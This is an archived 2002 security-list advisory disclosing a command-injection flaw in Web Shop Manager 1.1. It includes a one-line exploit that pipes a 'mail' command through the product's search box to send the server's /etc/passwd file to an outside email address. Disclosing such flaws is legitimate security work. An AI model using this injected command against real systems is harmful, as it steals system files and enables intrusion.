Web Shop Manager Security Vulnerability

From: Tacettin Karadeniz (tacettinkaradenizat_private)
Date: Thu Aug 15 2002 - 03:15:37 PDT

Next message: http-equivat_private: "SILLY BEHAVIOR : Internet Explorer 5.5 - 6.0"

Previous message: Shane Hird: "Delete arbitrary files using Help and Support Center [MSRC 1198dg]"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Summary 
The Web Shop
Manager(http://www.webscriptworld.com/scripts/wsm.phtml)
allows you to manage a fully functional online store
from a centralized web-based administration system. A
security vulnerability in the product allows executing
of arbitrary commands with the privileges of the
script file used by the product.

Details 
Vulnerable systems:
 * Web Shop Manager version 1.1

Exploit:
It is possible to send server's password file any mail
address by writing the following command in Web Shop
Manager's search box:

 |mail userat_private < /etc/passwd

 



__________________________________________________
Do You Yahoo!?
HotJobs - Search Thousands of New Jobs
http://www.hotjobs.com

Next message: http-equivat_private: "SILLY BEHAVIOR : Internet Explorer 5.5 - 6.0"
Previous message: Shane Hird: "Delete arbitrary files using Help and Support Center [MSRC 1198dg]"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Aug 15 2002 - 10:54:36 PDT